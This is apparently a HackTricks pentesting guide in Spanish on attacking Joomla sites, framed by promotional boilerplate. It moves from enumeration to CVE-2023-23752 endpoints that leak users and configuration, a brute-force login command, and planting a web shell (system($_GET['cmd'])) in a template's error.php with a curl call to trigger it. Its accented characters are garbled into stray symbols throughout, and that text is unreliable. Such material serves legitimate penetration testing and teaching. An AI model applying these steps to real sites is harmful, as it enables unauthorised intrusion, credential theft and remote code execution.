Joomla
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Estad铆sticas de Joomla
Joomla recopila algunas estad铆sticas de uso an贸nimas, como la distribuci贸n de las versiones de Joomla, PHP y bases de datos, as铆 como los sistemas operativos de servidor en uso en las instalaciones de Joomla. Estos datos se pueden consultar a trav茅s de su API p煤blica.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeraci贸n
Descubrimiento/Recopilaci贸n de Informaci贸n
- Verifica el meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Versi贸n
- En /administrator/manifests/files/joomla.xml puedes ver la versi贸n.
- En /language/en-GB/en-GB.xml puedes obtener la versi贸n de Joomla.
- En plugins/system/cache/cache.xml puedes ver una versi贸n aproximada.
Autom谩tico
droopescan scan joomla --url http://joomla-site.local/
En 80,443 - La metodolog铆a de pentesting web es una secci贸n sobre esc谩neres de CMS que pueden escanear Joomla.
Divulgaci贸n de Informaci贸n No Autenticada:
Las versiones desde 4.0.0 hasta 4.2.7 son vulnerables a la divulgaci贸n de informaci贸n no autenticada (CVE-2023-23752) que volcar谩 credenciales y otra informaci贸n.
- Usuarios:
http://<host>/api/v1/users?public=true
- Archivo de Configuraci贸n:
http://<host>/api/index.php/v1/config/application?public=true
M贸dulo MSF: scanner/http/joomla_api_improper_access_checks
o script ruby: 51334
Fuerza Bruta
Puedes usar este script para intentar forzar el inicio de sesi贸n.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
Si lograste obtener credenciales de administrador, puedes RCE dentro de 茅l agregando un fragmento de c贸digo PHP para obtener RCE. Podemos hacer esto personalizando una plantilla.
- Haz clic en
Templates
en la parte inferior izquierda bajoConfiguration
para abrir el men煤 de plantillas. - Haz clic en el nombre de una plantilla. Elijamos
protostar
bajo el encabezado de columnaTemplate
. Esto nos llevar谩 a la p谩ginaTemplates: Customise
. - Finalmente, puedes hacer clic en una p谩gina para abrir el c贸digo fuente de la p谩gina. Elijamos la p谩gina
error.php
. Agregaremos una l铆nea de c贸digo PHP para obtener ejecuci贸n de c贸digo de la siguiente manera: system($_GET['cmd']);
- Guardar y cerrar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
De XSS a RCE
- JoomSploit: Script de explotaci贸n de Joomla que eleva XSS a RCE u otras vulnerabilidades cr铆ticas. Para m谩s informaci贸n, consulta esta publicaci贸n. Proporciona soporte para las versiones de Joomla 5.X.X, 4.X.X y 3.X.X, y permite:
- Escalamiento de privilegios: Crea un usuario en Joomla.
- (RCE) Edici贸n de plantillas integradas: Edita plantillas integradas en Joomla.
- (Personalizado) Explotaciones personalizadas: Explotaciones personalizadas para complementos de Joomla de terceros.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.